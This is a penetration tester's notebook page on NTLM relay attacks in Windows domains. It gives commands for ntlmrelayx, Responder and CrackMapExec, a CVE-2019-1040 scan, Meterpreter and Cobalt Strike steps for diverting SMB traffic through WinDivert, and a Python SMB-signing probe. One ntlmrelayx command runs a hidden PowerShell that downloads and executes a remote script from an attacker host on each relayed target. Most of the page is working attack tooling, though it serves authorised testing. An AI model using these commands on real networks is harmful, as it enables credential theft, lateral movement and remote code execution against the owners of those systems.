Pentester's Promiscuous Notebook

NTLM Relay

Generate a relay list with CME (hosts where SMB signing is not required) and enumerate local admins on every target when relaying:

$ cme smb 192.168.2.0/24 --gen-relay-list relay.txt
$ ntlmrelayx.py -tf relay.txt -smb2support --enum-local-admins -of net-ntlmv2 --no-http-server --no-wcf-server --no-raw-server

Relay & catch hashes: put a local smbserver.py instance into the target list next to the real target, so that the sessions relayed to it authenticate against a server whose challenge is known and have their NetNTLMv2 hash printed in a crackable format:

$ smbserver.py -smb2support -port 8445 share `pwd`
$ ntlmrelayx.py -tf targets.txt -smb2support --no-http-server --no-wcf-server --no-raw-server
$ cat targets.txt
smb://10.10.13.37
smb://127.0.0.1:8445

The easier way, though, is to combine -of/--output-file hashes.txt with -ntlmchallenge 1122334455667788: the NetNTLMv2 responses are then saved to a file against a predefined server challenge while relaying, ready for offline cracking (hashcat -m 5600).

Relay NTLM responses obtained through Responder's proxy authentication (-P) to LDAP(S); Responder's own HTTP server must be set to Off in Responder.conf. HTTP is the right source for an LDAP target: an SMB client sets the NTLM signing flag, which the LDAP server honours and a relay cannot satisfy (unless the MIC can be dropped, see the CVE-2019-1040 scanner below), whereas proxy authentication from a browser or WinHTTP does not, so the relayed session works against LDAP when signing is not required and against LDAPS when channel binding is not enforced:

$ ntlmrelayx.py -t ldap(s)://DC01.megacorp.local --http-port 3128 [--add-computer] / [--delegate-access [--escalate-user 'PWNED-MACHINE$']] [-socks] --no-smb-server --no-wcf-server --no-raw-server --no-dump [--no-da --no-acl --no-validate-privs]
$ sudo ./Responder.py -I eth0 -wd -P -v
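What puts a host into relay.txt, and why domain controllers normally stay out of it, is a single bit in the SMB2 NEGOTIATE response. The following added example, which is not part of the original page and is neither CrackMapExec's nor impacket's code, builds a minimal SMB2 negotiate by hand, parses the server's SecurityMode and writes the result in the smb://host format that ntlmrelayx -tf expects. The two replies in demo() are constructed (one member server with signing enabled but not required, one DC with signing required, with made-up ServerGuid and size limits); probe_smb_signing() is the only function that touches the network and takes whatever hosts are given on the command line. All function names are this example's own.

```python
"""SMB2 NEGOTIATE security-mode check, the test behind `cme --gen-relay-list`.
Added example, not from the PPN page, CrackMapExec or impacket. Sample responses are
constructed; probe_smb_signing() is the only function that touches the network."""
import os
import socket
import struct
import sys

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
SIGNING_ENABLED = 0x0001   # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002  # SMB2_NEGOTIATE_SIGNING_REQUIRED


def smb2_header(command: int, flags: int = 0) -> bytes:
    """64-byte SMB2 packet header (MS-SMB2 2.2.1.2) with MessageId 0 and an empty signature."""
    return SMB2_MAGIC + struct.pack("<HHIHHIIQIIQ", 64, 0, 0, command, 0, flags, 0, 0, 0, 0, 0) + b"\x00" * 16


def build_negotiate_request(dialects=(0x0202, 0x0210)) -> bytes:
    """SMB2 NEGOTIATE request (MS-SMB2 2.2.3). The client must advertise SIGNING_ENABLED;
    it does not advertise SIGNING_REQUIRED, exactly like a relayable client."""
    body = struct.pack("<HHHHI", 36, len(dialects), SIGNING_ENABLED, 0, 0)  # ..., Reserved, Capabilities
    body += os.urandom(16)                                 # ClientGuid
    body += b"\x00" * 8                                    # ClientStartTime (no 3.1.1 contexts offered)
    body += struct.pack("<%dH" % len(dialects), *dialects)
    return smb2_header(SMB2_NEGOTIATE) + body


def build_negotiate_response(security_mode: int, dialect: int = 0x0210) -> bytes:
    """Constructed NEGOTIATE response (MS-SMB2 2.2.4) for offline testing; no real server involved."""
    body = struct.pack("<HHHH", 65, security_mode, dialect, 0)
    body += b"\x11" * 16                                   # ServerGuid (constructed)
    body += struct.pack("<IIIIQQHHI", 0, 0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 0)
    return smb2_header(SMB2_NEGOTIATE, SMB2_FLAGS_SERVER_TO_REDIR) + body


def parse_negotiate_response(pkt: bytes) -> dict:
    """Extract the server's signing posture; refuse anything that is not a clean SMB2 NEGOTIATE reply."""
    if len(pkt) < 70 or pkt[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 packet (SMB1-only host or garbage)")
    status = struct.unpack_from("<I", pkt, 8)[0]
    command = struct.unpack_from("<H", pkt, 12)[0]
    flags = struct.unpack_from("<I", pkt, 16)[0]
    if command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    if status != 0:
        raise ValueError(f"NEGOTIATE failed with NTSTATUS 0x{status:08x}")
    struct_size, security_mode, dialect = struct.unpack_from("<HHH", pkt, 64)
    if struct_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize")
    return {
        "dialect": dialect,
        "signing_enabled": bool(security_mode & SIGNING_ENABLED),
        "signing_required": bool(security_mode & SIGNING_REQUIRED),
    }


def gen_relay_list(results: dict) -> list:
    """ntlmrelayx -tf format: one smb://host line per host that does not require signing."""
    return [f"smb://{host}" for host, info in results.items() if not info["signing_required"]]


def _recv_exact(sock, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed mid-packet")
        buf += chunk
    return buf


def probe_smb_signing(host: str, port: int = 445, timeout: float = 3.0) -> dict:
    """Live check over direct-TCP SMB: 4-byte NetBIOS session header + SMB2 NEGOTIATE."""
    req = build_negotiate_request()
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"\x00" + len(req).to_bytes(3, "big") + req)
        length = int.from_bytes(_recv_exact(s, 4)[1:], "big")
        return parse_negotiate_response(_recv_exact(s, length))


def demo() -> list:
    """Offline walk-through on constructed replies: a member server (signing enabled, not
    required) and a DC (signing required). Only the member server ends up in the relay list."""
    results = {
        "192.168.2.10": parse_negotiate_response(build_negotiate_response(SIGNING_ENABLED)),
        "192.168.2.11": parse_negotiate_response(build_negotiate_response(SIGNING_ENABLED | SIGNING_REQUIRED)),
    }
    return gen_relay_list(results)


if __name__ == "__main__":
    # Usage: python smb_signing_check.py 192.168.2.10 192.168.2.11 ... > relay.txt
    live = {}
    for host in sys.argv[1:]:
        try:
            live[host] = probe_smb_signing(host)
        except (OSError, ValueError) as exc:
            print(f"[-] {host}: {exc}", file=sys.stderr)
    print("\n".join(gen_relay_list(live) if live else demo()))
```

An SMB1-only host answers with \xffSMB and is rejected rather than guessed at; the same SecurityMode bit is what a relay target enforces at session setup, so a host listed here with signing_required set will simply drop the relayed session.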

CVE-2019-1040-scanner

Check whether the DCs are patched against CVE-2019-1040 (drop-the-MIC: an unpatched DC accepts an NTLM AUTHENTICATE message whose MIC has been removed, which lets a relay clear the signing flags negotiated by an SMB client and relay SMB to LDAP). The scanner needs valid domain credentials:

$ python scan.py MEGACORP/snovvcrash:'Passw0rd!'@192.168.1.11
$ python scan.py -target-file DCs.txt MEGACORP/snovvcrash:'Passw0rd!'@placeholder.xyz

Relaying on Windows

meterpreter + SharpRelay

Divert incoming SMB traffic on Victim to Attacker's local port 445 through an elevated meterpreter session (SharpRelay loads the WinDivert kernel driver, so admin rights are required) and relay it to Target via the MSF SOCKS server.

1. Add a pivot route to the Target through the 1st meterpreter session (from msfconsole, after backgrounding the session; meterpreter's own route command edits the victim's routing table instead):

msf > route add 192.168.1.11/32 1

2. Start the MSF SOCKS server (it listens on port 1080 by default; point /etc/proxychains4.conf at 127.0.0.1:1080):

msf > use auxiliary/server/socks_proxy
msf auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf auxiliary(server/socks_proxy) > run -j

3. Forward a reverse port 8445 on Victim to local port 445 on Attacker, upload the driver and start diverting incoming traffic on Victim's port 445 to Victim's local port 8445:

meterpreter > portfwd add -R -L 127.0.0.1 -l 445 -p 8445
meterpreter > cd C:\\Windows\\System32\\drivers
meterpreter > upload /home/snovvcrash/www/WinDivert64.sys
meterpreter > background
msf > use post/windows/manage/execute_dotnet_assembly
msf post(windows/manage/execute_dotnet_assembly) > set SESSION 1
msf post(windows/manage/execute_dotnet_assembly) > set DOTNET_EXE /home/snovvcrash/www/SharpRelay.exe
msf post(windows/manage/execute_dotnet_assembly) > set ARGUMENTS relaysvc "C:\Windows\System32\drivers\WinDivert64.sys" 445 8445
msf post(windows/manage/execute_dotnet_assembly) > run

4. Relay the diverted traffic to Target through SOCKS (ntlmrelayx has to bind port 445, hence sudo):

$ sudo proxychains4 -q ntlmrelayx.py -t smb://192.168.1.11 -smb2support

Once it has run, the driver must be unloaded or the host rebooted before trying again. The fake service can be stopped and deleted from PowerShell:

PS > sc.exe stop relaysvc; sc.exe delete relaysvc

beacon + PortBender

Set up the SOCKS server & port forwarding, upload the WinDivert driver and configure the redirection with PortBender (the beacon must be elevated to load the driver, and PortBender.cna must be loaded in Cobalt Strike for the PortBender command to exist):

beacon> socks 1080
beacon> rportfwd 8445 127.0.0.1 445
beacon> cd C:\Windows\System32\drivers
beacon> upload /home/snovvcrash/www/WinDivert64.sys
beacon> PortBender redirect 445 8445

Relay the planet (proxychains pointed at the beacon's SOCKS port 1080; -c runs the command on Target after each successful relay):

$ sudo proxychains4 -q ntlmrelayx.py -t smb://192.168.1.11 -smb2support --no-http-server --no-wcf-server -c 'powershell -nop -w hidden -c "iex(new-object net.webclient).downloadstring(\"http://10.10.13.37:8080/pwn.ps1\")"'

Stop PortBender (it runs as a beacon job; kill the job, then the process it was spawned into):

beacon> jobs
beacon> jobkill <JID>
beacon> kill <PID>

https://en.hackndo.com/ntlm-relay/
https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/
https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/
https://www.secureauth.com/blog/playing-with-relayed-credentials/
https://www.secureauth.com/blog/we-love-relaying-credentials-a-technical-guide-to-relaying-credentials-everywhere/
https://intrinium.com/smb-relay-attack-tutorial/
https://www.sans.org/blog/smb-relay-demystified-and-ntlmv2-pwnage-with-python/
https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire
https://www.blackhillsinfosec.com/an-smb-relay-race-how-to-exploit-llmnr-and-smb-message-signing-for-fun-and-profit/
https://clement.notin.org/blog/2020/11/16/ntlm-relay-of-adws-connections-with-impacket/
https://luemmelsec.github.io/Relaying-101/
https://www.thehacker.recipes/active-directory-domain-services/movement/lm-and-ntlm/relay
https://www.trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022/
https://www.fortalicesolutions.com/posts/keeping-up-with-the-ntlm-relay
https://offsec.almond.consulting/ldap-relays-for-initial-foothold-in-dire-situations.html
https://labs.nettitude.com/blog/network-relaying-abuse-windows-domain/
https://xakep.ru/2023/04/07/ntlm-relay-guide/
https://xakep.ru/2023/04/11/ntlm-relay-guide-2/
[PDF] Coercions and Relays – The First Cred is the Deepest (Gabriel Prudhomme)
multi-relay
https://github.com/fox-it/cve-2019-1040-scanner/blob/master/scan.py
https://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445/
https://github.com/pkb1s/SharpRelay
https://github.com/praetorian-inc/PortBender
https://rastamouse.me/ntlm-relaying-via-cobalt-strike/
[PDF] Lateral Movement using Credentials Relaying (taso_x)